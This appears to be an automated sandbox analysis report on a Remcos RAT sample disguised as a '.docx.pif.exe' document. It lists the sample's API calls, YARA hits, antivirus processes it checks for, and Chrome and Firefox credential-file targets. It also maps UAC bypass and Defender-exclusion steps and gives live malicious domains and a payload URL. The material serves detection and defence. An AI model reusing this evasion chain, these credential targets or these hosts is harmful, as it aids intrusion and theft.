              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02985A78
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,0_2_029A5E01
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: GetLocaleInfoA,0_2_0298A7A0
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: GetLocaleInfoA,0_2_0298A754
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02985B84
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,0_2_0299DAA4
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,8_2_00007FF64B5751EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,8_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,8_2_00007FF64B573140
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00007FF64B5751EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,10_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00007FF64B573140
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,12_2_00007FF64B5751EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,12_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,12_2_00007FF64B573140
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,14_2_00007FF64B5751EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,14_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,14_2_00007FF64B573140
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,17_2_00007FF64B5751EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,17_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,17_2_00007FF64B573140
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,31_2_045C8404
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,31_2_045D243C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,31_2_045D2543
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,31_2_045D2610
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,31_2_045D2036
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,31_2_045D20C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,31_2_045D2313
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,31_2_045D1CD8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,31_2_045D1F50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,31_2_045D1F9B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,31_2_0458F8D1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,31_2_045C88ED
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\xkn.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0298919C GetLocalTime,0_2_0298919C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459B60D GetUserNameW,31_2_0459B60D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045C9190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,31_2_045C9190
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0298B71C GetVersionExA,0_2_0298B71C
              Source: C:\Users\Public\xkn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\gaban\logs.dat, type: DROPPED
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data31_2_0458BA12
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\31_2_0458BB30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db31_2_0458BB30

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3
              Yara detected Remcos RAT
              Source: Yara matchFile source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\gaban\logs.dat, type: DROPPED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe31_2_0458569A

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		1
              Valid Accounts              		1
              Windows Management Instrumentation              		1
              Scripting              		1
              Abuse Elevation Control Mechanism              		211
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		12
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		111
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol111
              Input Capture              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts1
              Shared Modules              		1
              Valid Accounts              		1
              Bypass User Account Control              		1
              Abuse Elevation Control Mechanism              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Command and Scripting Interpreter              		1
              Windows Service              		1
              Valid Accounts              		12
              Obfuscated Files or Information              		NTDS1
              System Network Connections Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              Service Execution              		1
              Registry Run Keys / Startup Folder              		11
              Access Token Manipulation              		2
              Software Packing              		LSA Secrets4
              File and Directory Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Windows Service              		1
              Timestomp              		Cached Domain Credentials47
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items522
              Process Injection              		1
              DLL Side-Loading              		DCSync361
              Security Software Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job1
              Registry Run Keys / Startup Folder              		1
              Bypass User Account Control              		Proc Filesystem141
              Virtualization/Sandbox Evasion              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt431
              Masquerading              		/etc/passwd and /etc/shadow3
              Process Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Valid Accounts              		Network Sniffing1
              Application Window Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd141
              Virtualization/Sandbox Evasion              		Input Capture1
              System Owner/User Discovery              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
              Access Token Manipulation              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers522
              Process Injection              		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466663 Sample: #U8f6e#U6905-#U89c4#U683c20... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 78 www.vipguyclassproject2024.space 2->78 80 wcmanagers.com 2->80 82 198.187.3.20.in-addr.arpa 2->82 86 Found malware configuration 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 Antivirus detection for URL or domain 2->90 92 17 other signatures 2->92 12 #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe 1 4 2->12         started        17 SystemSettingsAdminFlows.exe 2->17         started        signatures3 process4 dnsIp5 84 wcmanagers.com 108.170.55.202, 443, 49699, 49700 SSASN2US United States 12->84 72 C:\Users\Public\Libraries\drbdmeyP.pif, PE32 12->72 dropped 74 C:\Users\Public\Pyemdbrd.url, MS 12->74 dropped 76 C:\Users\Public\Libraries\Pyemdbrd, data 12->76 dropped 122 Detected unpacking (creates a PE file in dynamic memory) 12->122 124 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->124 126 Drops PE files with a suspicious file extension 12->126 128 7 other signatures 12->128 19 drbdmeyP.pif 8 12->19         started        23 colorcpl.exe 12->23         started        25 extrac32.exe 12->25         started        file6 signatures7 process8 file9 60 C:\Users\user\AppData\Local\Temp\...\D2F8.bat, ASCII 19->60 dropped 94 Detected unpacking (changes PE section rights) 19->94 27 cmd.exe 1 19->27         started        62 C:\ProgramData\gaban\logs.dat, data 23->62 dropped 96 Contains functionality to bypass UAC (CMSTPLUA) 23->96 98 Detected Remcos RAT 23->98 100 Contains functionalty to change the wallpaper 23->100 104 5 other signatures 23->104 64 C:\Users\Public\Libraries\Pyemdbrd.PIF, PE32 25->64 dropped 102 Drops PE files with a suspicious file extension 25->102 signatures10 process11 signatures12 118 Drops executables to the windows directory (C:\Windows) and starts them 27->118 120 Adds a directory exclusion to Windows Defender 27->120 30 alpha.exe 1 27->30         started        33 extrac32.exe 1 27->33         started        36 alpha.exe 2 27->36         started        38 8 other processes 27->38 process13 file14 130 Adds a directory exclusion to Windows Defender 30->130 40 xkn.exe 8 30->40         started        58 C:\Users\Public\alpha.exe, PE32+ 33->58 dropped 132 Drops PE files to the user root directory 33->132 134 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 33->134 43 extrac32.exe 1 38->43         started        46 extrac32.exe 1 38->46         started        48 extrac32.exe 1 38->48         started        50 taskkill.exe 38->50         started        signatures15 process16 file17 110 Powershell is started from unusual location (likely to bypass HIPS) 40->110 112 Adds a directory exclusion to Windows Defender 40->112 114 Reads the Security eventlog 40->114 116 Reads the System eventlog 40->116 52 alpha.exe 40->52         started        66 C:\Users\Public\xkn.exe, PE32+ 43->66 dropped 68 C:\Users\Public\ger.exe, PE32+ 46->68 dropped 70 C:\Windows \System32\per.exe, PE32+ 48->70 dropped signatures18 process19 signatures20 106 Adds a directory exclusion to Windows Defender 52->106 55 ger.exe 52->55         started        process21 signatures22 108 UAC bypass detected (Fodhelper) 55->108

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe45%ReversingLabsWin32.Trojan.Zusy
              #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe50%VirustotalBrowse
              #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\Pyemdbrd.PIF100%Joe Sandbox ML
              C:\Users\Public\Libraries\Pyemdbrd.PIF45%ReversingLabsWin32.Trojan.Zusy
              C:\Users\Public\Libraries\Pyemdbrd.PIF50%VirustotalBrowse
              C:\Users\Public\Libraries\drbdmeyP.pif3%ReversingLabs
              C:\Users\Public\Libraries\drbdmeyP.pif0%VirustotalBrowse
              C:\Users\Public\alpha.exe0%ReversingLabs
              C:\Users\Public\alpha.exe0%VirustotalBrowse
              C:\Users\Public\ger.exe0%ReversingLabs
              C:\Users\Public\ger.exe0%VirustotalBrowse
              C:\Users\Public\xkn.exe0%ReversingLabs
              C:\Users\Public\xkn.exe0%VirustotalBrowse
              C:\Windows \System32\per.exe3%ReversingLabs
              C:\Windows \System32\per.exe0%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              wcmanagers.com0%VirustotalBrowse
              198.187.3.20.in-addr.arpa1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://wcmanagers.com:443/Er9/233_PyemdbrdppsWz0%Avira URL Cloudsafe
              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%Avira URL Cloudsafe
              https://wcmanagers.com/0%Avira URL Cloudsafe
              https://wcmanagers.com/Er9/233_Pyemdbrdpps030%Avira URL Cloudsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%Avira URL Cloudsafe
              https://wcmanagers.com/Er9/233_Pyemdbrdpps0%Avira URL Cloudsafe
              http://www.pmail.com0%Avira URL Cloudsafe
              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%VirustotalBrowse
              http://ocsp.sectigo.com0C0%Avira URL Cloudsafe
              https://login.windows.localP0%Avira URL Cloudsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%VirustotalBrowse
              https://wcmanagers.com/0%VirustotalBrowse
              www.vipguyclassproject2024.space100%Avira URL Cloudmalware
              http://www.pmail.com0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              wcmanagers.com
              		108.170.55.202
              		truetrueunknown
              198.187.3.20.in-addr.arpa
              		unknown
              		unknowntrueunknown
              www.vipguyclassproject2024.space
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://wcmanagers.com/Er9/233_Pyemdbrdppstrue
                • Avira URL Cloud: safe
                		unknown
                www.vipguyclassproject2024.spacetrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpcolorcpl.exefalse
                • URL Reputation: safe
                		unknown
